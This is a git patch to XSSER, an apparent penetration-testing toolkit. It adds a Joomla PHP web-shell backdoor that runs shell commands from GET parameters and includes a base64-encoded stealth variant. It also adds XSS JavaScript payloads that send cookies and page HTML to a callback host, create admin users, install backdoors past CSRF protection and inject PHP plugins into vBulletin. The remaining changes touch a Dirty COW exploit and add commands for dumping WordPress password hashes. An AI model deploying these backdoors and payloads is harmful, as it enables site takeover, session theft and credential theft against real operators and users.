From 18dbdbdb05f07e7db08ce62bca529f7022fe7062 Mon Sep 17 00:00:00 2001 
From: Varbaek Date: Thu, 8 Mar 2018 18:57:25 +0100 Subject: [PATCH] Public Release of Version 2.7.5 + Extras --- Audio/AUDIO_LICENSE | 6 +- CHANGELOG | 104 +- Cool Commands | 14 +- Exploits/dirtycow32.c | 3 +- Hello_Shell/admin/helloshell.php | 28 + .../admin/index.html | 0 .../admin/sql/index.html | 0 .../admin/sql/updates/index.html | 0 .../admin/sql/updates/mysql/0.0.1.sql | 0 .../admin/sql/updates/mysql/index.html | 0 .../helloshell.xml | 13 +- Hello_Shell/site/helloshell.php | 28 + .../site/index.html | 0 Joomla_Backdoor/Hello_Shell.zip | Bin 3089 -> 0 bytes .../Hello_Shell/admin/helloshell.php | 7 - .../Hello_Shell/site/helloshell.php | 7 - LICENSE | 12 +- Payloads/javascript/generic_payload.js | 58 + Payloads/javascript/joomla_admin.js | 62 +- Payloads/javascript/joomla_backdoor.js | 86 + Payloads/javascript/vbulletin_legacy.js | 222 +- Payloads/javascript/wordpress_legacy.js | 343 +-- Payloads/javascript/wordpress_plugin.js | 270 +-- Payloads/javascript/wordpress_theme.js | 258 ++- README.md | 59 +- Shells/meterpreter/LICENSE | 1972 ++++++++--------- Shells/meterpreter/meterpreter.php | 112 +- .../php-reverse-shell-notify.php | 2 +- requirements-all-libraries-used.txt | 15 + requirements.txt | 3 + xsser.py | 1695 ++++++++------ 31 files changed, 3070 insertions(+), 2309 deletions(-) create mode 100644 Hello_Shell/admin/helloshell.php rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/mysql/0.0.1.sql (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/mysql/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/helloshell.xml (84%) create mode 100644 Hello_Shell/site/helloshell.php rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/site/index.html (100%) 
delete mode 100644 Joomla_Backdoor/Hello_Shell.zip
delete mode 100644 Joomla_Backdoor/Hello_Shell/admin/helloshell.php
delete mode 100644 Joomla_Backdoor/Hello_Shell/site/helloshell.php
create mode 100644 Payloads/javascript/generic_payload.js
create mode 100644 Payloads/javascript/joomla_backdoor.js
create mode 100644 requirements-all-libraries-used.txt
create mode 100644 requirements.txt
diff --git a/Audio/AUDIO_LICENSE b/Audio/AUDIO_LICENSE
index 07cff8c..a14f58f 100644
--- a/Audio/AUDIO_LICENSE
+++ b/Audio/AUDIO_LICENSE
@@ -1,3 +1,5 @@
-The audio files (.wav and .mp3) located within the Audio directory are considered fair use and may not be used commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".)
+The audio files (.wav and .mp3) located within the Audio directory, are considered fair use and may not be used
+commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".)
 
-The creator of this tool only holds copyright over the word "Shell" used in the aforementioned audio files, which are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.)
\ No newline at end of file
+The creator of this tool only holds copyright over the word "Shell", used in the aforementioned audio files, which
+are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.)
\ No newline at end of file
diff --git a/CHANGELOG b/CHANGELOG
index ed47ea8..a948f81 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,18 +1,86 @@ -CHANGELOG - -Version 2.5: -- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now properly replaced) -- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to provide hostname to exploit. -- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ Note: This seems to cause kernel panic after the user quits the shell. -- Removed --title from gnome-terminal commands as this option is no longer supported. -- Notifications: - -- Added notification to the console / web server log. - -- Added a popup terminal notification with some ANSI text when the JavaScript is executed and "JS Shell Notify" is triggered. - -- Added a voice notification when the Reverse PHP Shell (Notify) option is executed on the remote server. Shell attempts to wget back to this host to the PHP Shell Notify web handler. -- Automation: - -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. -- New attack vectors: - -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 - - Version 2.0: - - First public version for Black Hat Europe \ No newline at end of file +CHANGELOG + +/--------------\ +| Version 2.75 | +\--------------/ +General: +- Various improvements and optimizations. +- Various files may have comments such as: // noinspection JSUndefinedPropertyAssignment + This type of comment is intended for PyCharm to ignore certain warnings and errors. +- Various todo notes have been added to the files for future versions. These also function + as a roadmap, to see what's planned in upcoming releases. +- Added another command to run during post-exploitation scenarios for WordPress. +- Added some other commands and resources for post-exploitation in general. +- Formatted license slightly so that it has appropriate linebreaks. 
+- Added "requirements.txt" and "requirements-all-libraries-used.txt" files for easier + dependency installation with python pip. + +Joomla backdoor: +- Now checks if the "c" or "c64" parameters are set before executing any code. +- Base64 encoded payloads are now, also supported via the "c64" HTTP parameter. +- All error reporting has been disabled for this backdoor. +- For added stealth, this backdoor/plugin can e.g. be encoded. (Refer to PHP files.) +- Additional comments about advanced usage can also be found in the PHP files. +- For changing how the plugin itself works and is referenced within Joomla, + please refer to the helloshell.xml file. Note: Almost everything can easily be changed + in these files, except the directory name which must also be renamed in xsser.py. + +JavaScript payloads: +- Added a new educational and generic payload. This has not been implemented into xsser.py yet. +- Versions standardized across all payloads. +- SetCookie() now uses non-deprecated functions. +- The "cookie match" now uses regular expressions to properly check if the attacker's cookie is present. +- Joomla payloads now have a "self-removal" option for the initial injection. + Note: This only seems to work when executed manually at the moment. +- WordPress payloads have been updated to use "nonce" instead of "_wpnonce", as this was changed since + last year. A future version may be used to generate the correct payload, depending on whether a very + old version of WordPress is in use, or a currently up to date version. +- The prepopulated forms in the WordPress payloads have been updated, to accommodate source code changes + since last year. +- setTimeout() was updated so it is used in a better, and more maintainable manner. +- Header sections are now more standardized, in terms of design and layout. + +XSSER: +- Switched from gnome-terminal to xterm due to several configuration options being deprecated. +- Removed the redundant requirements description. 
Please refer to the README.md file instead. +- Removed "written for", "tested on", "tested against", and "changelog". Refer to README.md +- Added new function which gets all assigned IP addresses and lets the user choose which to listen on. + This minimizes the time that the user has to spend on typing the IP address to listen on and serve files from. + -- vBSEO and BetterWPSecurity Exploits: PHP and JS filenames are now generated in a more random manner. +- All JavaScript payloads are now minified (comments and extra newlines removed) and base64 encoded during run-time. +- Converted all "os.system(curl)" requests to python requests with 3 second timeout instead. +- Converted all "httplib.HTTPConnection()" requests to python 'requests' with 3 second timeout. +- Replaced all "%s" with "{}".format() +- Joomla "Hello_Shell" backdoor (zip) file, is now automatically generated each time the xsser.py tool runs. + Note: If you make a change to any of the files in the Hello_Shell directory, simply exit xsser.py and run + it again to automatically create the zip file. +- Experimental POST-request handler implemented into the generic web server. This is currently not used. + +Testing: +- All exploits and payloads have been tested against the latest application versions, except vBulletin 4.X.X + which is not compatible with the now deprecated vBSEO plugin. + +/-------------\ +| Version 2.5 | +\-------------/ +- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now + properly replaced) +- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to + provide hostname. +- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ + Note: This seems to cause kernel panic after the user quits the shell. +- Removed --title from gnome-terminal commands as this option is no longer supported. 
+- Notifications: + -- Added notifications to the console / web server log. + -- Added a popup notification with some ASCII text, when the JavaScript has been fully executed by the target. + -- Added a voice notification, when the Reverse PHP Shell (Notify) option is used, and the associated code + in the PHP shell connects back to the attacker's machine. +- Automation: + -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. +- New attack vectors: + -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 + +/-------------\ +| Version 2.0 | +\-------------/ +- First public version for Black Hat Europe \ No newline at end of file diff --git a/Cool Commands b/Cool Commands index 321ea03..a12e663 100644 --- a/Cool Commands +++ b/Cool Commands @@ -5,4 +5,16 @@ cat config.php | grep -P '(MasterServer|dbname)' WordPress: cat wp-config.php | grep -P '(KEY|SALT)' -cat wp-config.php | grep DB_ \ No newline at end of file +cat wp-config.php | grep DB_ + +# Username: root, Password: root, Database name: wordpress +mysql -uroot -proot wordpress -e 'select user_login,user_pass from wp_users;' > /tmp/wordpress_hashes +# Download the file and then run it against hashcat (-m 400) for example. +# See e.g. https://samsclass.info/seminars/CMS/hashcat-wordpress.htm + +Less cool commands: +1) Find world-writeable files: find /dir -xdev -perm +o=w ! \( -type d -perm +o=t \) ! -type l -print +2) Find world-readable files: find /dir -xdev -perm +o=r ! \( -type d -perm +o=t \) ! -type l -print + +Privilege escalation: +https://github.com/mzet-/linux-exploit-suggester \ No newline at end of file diff --git a/Exploits/dirtycow32.c b/Exploits/dirtycow32.c index 9fb5708..d86a2d4 100644 --- a/Exploits/dirtycow32.c +++ b/Exploits/dirtycow32.c 
@@ -30,7 +30,7 @@ struct stat st; char *name; pthread_t pth1,pth2,pth3; -// change if no permissions to read +// Change if no permissions to read char suid_binary[] = "/usr/bin/passwd"; /* @@ -51,7 +51,6 @@ unsigned char sc[] = { 0x89, 0xe1, 0xcd, 0x80 }; unsigned int sc_len = 136; -/**/ void *madviseThread(void *arg) { diff --git a/Hello_Shell/admin/helloshell.php b/Hello_Shell/admin/helloshell.php new file mode 100644 index 0000000..07422eb --- /dev/null +++ b/Hello_Shell/admin/helloshell.php @@ -0,0 +1,28 @@ +"; + echo @system($_GET['c']); // Don't output errors. + echo ""; +} + +if (isset($_GET['c64']) && !empty($_GET['c64'])) { + echo "
";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "
"; +} + +// If you want to be more stealthy, then you can use only the line below. +// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding. +// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9")); + +// If you use this during a penetration test, you may want to consider adding some sort of authentication. +// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here } +// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server. +// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a +// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor. +?> diff --git a/Joomla_Backdoor/Hello_Shell/admin/index.html b/Hello_Shell/admin/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/index.html rename to Hello_Shell/admin/index.html diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/index.html b/Hello_Shell/admin/sql/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/index.html rename to Hello_Shell/admin/sql/index.html diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/index.html b/Hello_Shell/admin/sql/updates/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/index.html rename to Hello_Shell/admin/sql/updates/index.html 
diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql b/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql rename to Hello_Shell/admin/sql/updates/mysql/0.0.1.sql diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/index.html b/Hello_Shell/admin/sql/updates/mysql/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/index.html rename to Hello_Shell/admin/sql/updates/mysql/index.html diff --git a/Joomla_Backdoor/Hello_Shell/helloshell.xml b/Hello_Shell/helloshell.xml similarity index 84% rename from Joomla_Backdoor/Hello_Shell/helloshell.xml rename to Hello_Shell/helloshell.xml index fceddae..2b09bef 100644 --- a/Joomla_Backdoor/Hello_Shell/helloshell.xml +++ b/Hello_Shell/helloshell.xml @@ -1,17 +1,18 @@ + - + Hello Shell! - November 2016 - John Doe - john.doe@example.org - http://www.example.org + March 2018 + Varbaek + xsser@varbits.net + https://www.varbits.com Copyright Info License Info - 0.0.1 + 2.7.5 Description of the Hello Shell component ... diff --git a/Hello_Shell/site/helloshell.php b/Hello_Shell/site/helloshell.php new file mode 100644 index 0000000..07422eb --- /dev/null +++ b/Hello_Shell/site/helloshell.php @@ -0,0 +1,28 @@ +"; + echo @system($_GET['c']); // Don't output errors. + echo ""; +} + +if (isset($_GET['c64']) && !empty($_GET['c64'])) { + echo "
";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "
"; +} + +// If you want to be more stealthy, then you can use only the line below. +// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding. +// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9")); + +// If you use this during a penetration test, you may want to consider adding some sort of authentication. +// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here } +// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server. +// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a +// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor. +?> diff --git a/Joomla_Backdoor/Hello_Shell/site/index.html b/Hello_Shell/site/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/site/index.html rename to Hello_Shell/site/index.html 
diff --git a/Joomla_Backdoor/Hello_Shell.zip b/Joomla_Backdoor/Hello_Shell.zip deleted file mode 100644 index d1e3118cd6e9a117dc4cc31b390ecad761710746..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3089 zcmWIWW@Zs#W&i??#mSx^8U}cP43E^Doc#FU3?QW+09UEE6IG=Un##nK+{`?JG3xExik%EFM{+RuIeEC9RF=(G0a~U5#4=bd z&CE+ltstH+6gQZm{v2vO~(u@ zF|4K+7b1cU(?tq6^-#-IayV@$El5c$Ni9Z-B=qpoAgGsGt^~ypazcY7A5hrAT$x)5 z3rQ|;QU$pcs0j{qfh=N7Fwis5Gt>i`g*%z(5or{8p66iLwJ_O}uj}H*k4y{h?r@A6{UMOXy-6V=&yX5%=>uBo4(2OK6zI8EHQ04#kC|xUsimA zNOiS-(P2{&dB&NWGF#XGwaIp>aFPE~`r6u|@z|w#h3sdpF|IB?xltZ;5tR74$KFBO${*CdAjEuFNP1V%&!^Vd`iB2j#I(042?hO;t4KK*o zUWi%si0^!G;zQk>9qU9Vtm$|wSbNBPIhPSrZN&QPFTeY7WfqkmfB z#FXvoGbX8O@gFU%**?MS)=PJ$GB<-M%`Fq>S!%2mR+!PV_|ubF>5b<_w=`|-JepWF zL+)whZrLj31JnJ?{1Wcw`m^Z#@Cx+2ZQ>Ze`%v?iM~mVoH@C=~arW8e!jiGm3DUAz0ax>UR?TdVCtd`%zGqfbmrJR^$?ih zuX*Lf_A5J@D?G$cWlgJ;RJgtFPNamltJdR|2F|wRJv$Fx;<&LS^nymL_#L+i`>$O# zUc0)AThx4?;1q7%-X*(b9({5BdM~&2Cd-+u6@~{*j!rT8{zd_`Y&JYC4ZkkXP2M5_|^KocTKl9PTI|EJ8$B{pO!ynJHCka+aI%i{)_To zE|Xk~ogYg*{`==aR(ajGPj6nvul~Ua%b1uYtRPxODb6fOMJm3~>lk@#%8@b`Evgu4 zY<7}bP%tvtGvlt1fi?hvK*Iq?5RF{s1$ZNLVymD*>LEI{fHbmBSal84kG;YMYiCes zSkf4URX=LjB3y%6?}2J!2mqOO9>~OW4IkLQDj?6WB~5%0#5P7p1c@bu(0UH*`0fCg9f%PyV znlKX~s9=HsP=NNcp_&6NrVw7lR!~8-gFbw_qk2Pzi)E%m~=NK=u>Z YEy#hx3bc)ZfgcESSQr@kfyx;e0H6!it^fc4 diff --git a/Joomla_Backdoor/Hello_Shell/admin/helloshell.php b/Joomla_Backdoor/Hello_Shell/admin/helloshell.php deleted file mode 100644 index 4a15c7d..0000000 --- a/Joomla_Backdoor/Hello_Shell/admin/helloshell.php +++ /dev/null @@ -1,7 +0,0 @@ -"; -echo system($_GET['c']); -echo ""; - -?> diff --git a/Joomla_Backdoor/Hello_Shell/site/helloshell.php b/Joomla_Backdoor/Hello_Shell/site/helloshell.php deleted file mode 100644 index 4a15c7d..0000000 --- a/Joomla_Backdoor/Hello_Shell/site/helloshell.php +++ /dev/null @@ -1,7 +0,0 @@ -"; -echo system($_GET['c']); -echo ""; - -?> diff --git a/LICENSE b/LICENSE index f152a42..6170346 100644 --- a/LICENSE 
+++ b/LICENSE @@ -10,13 +10,15 @@ to make commercial use of the work Under the following conditions: Attribution -- You must give the original author credit. -Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting work only under a licence identical to this one. +Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting + work only under a licence identical to this one. With the understanding that: Waiver -- Any of the above conditions can be waived if you get permission from the copyright holder. -Public Domain -- Where the work or any of its elements is in the public domain under applicable law, that status is in no way affected by the licence. +Public Domain -- Where the work or any of its elements is in the public domain under applicable law, + that status is in no way affected by the licence. Other Rights -- In no way are any of the following rights affected by the licence: @@ -24,9 +26,11 @@ Your fair dealing or fair use rights, or other applicable copyright exceptions a The author's moral rights; -Rights other persons may have either in the work itself or in how the work is used, such as publicity or privacy rights. +Rights other persons may have either in the work itself or in how the work is used, such as publicity +or privacy rights. Notice -- For any reuse or distribution, you must make clear to others the licence terms of this work. -This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php (refer to the attached GPLv2). \ No newline at end of file +This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php +(refer to GPLv2: https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html). \ No newline at end of file diff --git a/Payloads/javascript/generic_payload.js b/Payloads/javascript/generic_payload.js new file mode 100644 index 0000000..877c9f1 --- /dev/null 
+++ b/Payloads/javascript/generic_payload.js 
@@ -0,0 +1,58 @@
+/*
+Title: Generic JS Payload
+Author: Hans-Michael Varbaek
+Company: VarBITS
+
+Version: 2.75 - Extras
+
+Changelog:
+- Ver 2.75 : First version published with the "extras" release.
+
+Inspired by: XSSHunter
+
+Description:
+This payload obtains information about the page where it was executed.
+While it does not attempt to hook the browser, or make the administrator
+perform an arbitrary action, it is useful during web app penetration tests
+where hidden functionality is not tested, such as a control panel which
+may be vulnerable to stored cross-site scripting.
+(i.e. a user's profile is viewed from an admin control panel.)
+
+This particular payload is mostly meant for educational purposes.
+
+TODO:
+- Implement this as an option within the xsser.py tool
+- Implement error handling in a future version if necessary:
+ try {
+ x = x();
+ } catch ( e ) {
+ x = '';
+ }
+
+For ethical and legal purposes only. This script is provided as is and without warranty.
+*/
+
+// DEFINE VARIABLES
+var domain = document.domain; // "pypi.python.org"
+// You can also use the following: location.origin which includes the scheme, i.e. http/https
+var location = document.location(); // "https://pypi.python.org/pypi/jsmin"
+// You could also use the following: location.toString()
+var cookies = document.cookie; // "__utma=1234567890...;__utmb=0987654321"
+var referrer = document.referrer; // "google.com"
+var useragent = navigator.userAgent; // "Mozilla/5.0 ..."
+var unixtime = new Date().getTime().toString(); // 1515353242209
+var fullpage = document.documentElement.outerHTML; // Complete HTML page, useful for analysis.
+
+// CREATE FORM AND SEND REQUEST
+var formData = new FormData();
+formData.append("domain_name", domain);
+formData.append("complete_url", location);
+formData.append("non_http_only_cookies", cookies);
+formData.append("http_referer", referrer);
+formData.append("user_agent", useragent);
+formData.append("unix_time", unixtime);
+formData.append("full_html_page", fullpage);
+
+var request = new XMLHttpRequest();
+request.open("POST", "http://CALLBACKHOST:CALLBACKPORT/"); // This will be populated by the xsser.py tool.
+request.send(formData);
\ No newline at end of file
diff --git a/Payloads/javascript/joomla_admin.js b/Payloads/javascript/joomla_admin.js
index 9110f35..6728674 100644
--- a/Payloads/javascript/joomla_admin.js
+++ b/Payloads/javascript/joomla_admin.js
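Review bot: The documentation in this new file contradicts itself: the header's TODO states the payload "has not been implemented into xsser.py yet", while the trailing comment on `request.open(...)` says the `CALLBACKHOST:CALLBACKPORT` placeholder "will be populated by the xsser.py tool", so a reader cannot tell from the file whether the placeholder is substituted at all. I would reword the latter to `// Placeholder - not yet substituted by xsser.py (see TODO above).` so the two statements agree. Separately, the example values in the variable comments name a real third-party site ("pypi.python.org"); a reserved placeholder such as example.org would avoid pointing documentation at a live domain.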
@@ -1,10 +1,28 @@ -// Original authors: Gökmen Güreçi & Muhammet Dilmaç -// Modified by Hans-Michael Varbaek for the XSSER 2.5 -// -// For ethical and legal purposes only. This script is provided as is and without warranty. +/* +Title: Joomla Core Payload (New Admin User) +Author: Hans-Michael Varbaek +Company: VarBITS -var request = new XMLHttpRequest(); -var req = new XMLHttpRequest(); +Version: 2.75 + +Changelog: +- Ver 2.75 : A few minor improvements. +- Ver 2.5 : First release. + +Special Credits: Gökmen Güreçi, Muhammet Dilmaç and Sense of Security (Version 2.5) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update this payload, or add a new payload that uses FormData() and XMLHttpRequest() +*/ + +var request = new XMLHttpRequest(); // Initial request to get CSRF token +var req = new XMLHttpRequest(); // Subsequent request to inject new user var id = ''; var boundary = Math.random().toString().substr(2); var space = "-----------------------------"; 
@@ -84,21 +102,31 @@ request.onload = function() { "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n"; - req.onload = function() { - if (req.status >= 200 && req.status < 400) { - var resp = req.responseText; - console.log(resp); - } - }; req.send(multipart); } }; request.send(); - // NEW FEATURE (Callback Notification) - var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest - request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request2.send(); // Send the request +// Callback Notification +var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest +request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); +// Method and URL to send the request to - Hostname and port are set by: xsser.py +request2.send(); // Send the request + +// TODO: Fix this in a later version +// Confirmed working manually in Chrome. For some reason, it does not work when executed as a script. +/* +Maybe we need to introduce a delay? +Maybe we have to specify top.document? 
+ + setTimeout(function() { + clean_up(); + }, 2000); -//Joomla.checkAll(this); // For auto self-clean up later +checkboxes = document.getElementsByName('cid[]'); +for(var i=0, n=checkboxes.length;i= 200 && request.status < 400) { + var resp = request.responseText; + var myRegex = //; + id = myRegex.exec(resp)[1]; + req.open('POST', 'index.php?option=com_installer&view=install', true); + req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); + var multipart = space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_package\"; filename=\"\"" + + "\r\nContent-Type: application/octet-stream\r\n\r\n\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_directory\"" + + "\r\n\r\n/var/www/html/tmp\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_url\"" + + "\r\n\r\nVAR_BACKDOOR_URL\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"type\"" + + "\r\n\r\n\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"installtype\"" + + "\r\n\r\nurl\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"task\"" + + "\r\n\r\ninstall.install\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + + "\r\n\r\n1\r\n" + + space + boundary + "--\r\n"; + req.send(multipart); + } +}; + +request.send(); + +// Callback Notification +var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest +request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); +// Method and URL to send the request to - Hostname and port are set by: xsser.py +request2.send(); // Send the request + +// TODO: Fix this in a later version +// Confirmed working manually in Chrome. For some reason, it does not work when executed as a script. +/* +Maybe we need to introduce a delay? +Maybe we have to specify top.document? 
+ + setTimeout(function() { + clean_up(); + }, 2000); + +checkboxes = document.getElementsByName('cid[]'); +for(var i=0, n=checkboxes.length;i\ - \ - \ - \ - \ - \ - \ - \ - \ - '; - - // A function which injects our prepopulated form - function silent_form_inject(action,method,content) { - var silent_main_tag = document.createElement('form'); - - // The inner contents of our form is equal to the content variable - This is the legacy way of doing it - silent_main_tag.innerHTML = ' '+content; - top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag); - silent_main_tag.setAttribute('id','soslabs'); - silent_main_tag.setAttribute('name','soslabs'); - silent_main_tag.setAttribute('action',action); - silent_main_tag.setAttribute('method',method); - } - - // Inject our prepopulated form - silent_form_inject('plugin.php?do=update','POST',form_input); - - // Submit our payload automatically - There's no turning back now - if (document.cookie.indexOf("XSS_Infected") == -1) { - top.document.getElementById('silent_frame').contentDocument.getElementById('soslabs').submit(); - // NEW FEATURE - Moved to this section to prevent double-loading of the URL - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - SetCookie("XSS_Infected","true"); // Prevent re-infection / loops - } - - // Give the malicious linkback two seconds to inject our payload, before self-removal - var end = setTimeout("clean_up()",2000); - -} - -// Delete all LinkBacks on the current page - Including ours -// This basically removes our injected data -function clean_up() { - js_check_all_option(document.linkbacks, -1); - document.linkbacks.submit(); -} - -// A function to create a cookie so the infection happens only once -function SetCookie(cookieName,cookieContent) { 
- var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - - -// If our cookie is not present, continue -if (document.cookie.indexOf("XSS_Infected") == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id', 'silent_frame'); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload', 'main.silent_inject()'); - mainframe.setAttribute('src', 'plugin.php?do=add'); -} - +/* +Title: vBulletin Core Payload (Plugin) +Author: MaXe / InterN0T +Updated by: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Changed coding style to be more consistent. + Fixed various deprecated functions. + Various other minor improvements. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +// Some IDEs may complain that silent_inject() is not used. (It is used.) +// noinspection JSUnusedGlobalSymbols +function silent_inject() { + + // Read and save the adminhash + securitytoken - For bypassing the CSRF protection. 
+ // noinspection Annotator + var adminhash = top.document.getElementById('silent_frame').contentDocument.cpform.adminhash.value; + // noinspection Annotator + var securitytoken = top.document.getElementById('silent_frame').contentDocument.cpform.securitytoken.value; + + // TODO: Use the pre-existing form in the future if possible. + // Prepopulated form that adds a new plugin to vBulletin + // The adminhash and securitytoken parameters are CSRF tokens + // The phpcode parameter value is updated by the (xsser.py) python script + var form_input = ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + // Note: The HTML input was changed because python's "jsmin" would treat the content as comments. + + // A function which injects our prepopulated form + function silent_form_inject(action, method, content) { + var silent_main_tag = document.createElement('form'); + + // The inner contents of our form is equal to the content variable - This is the legacy way of doing it. 
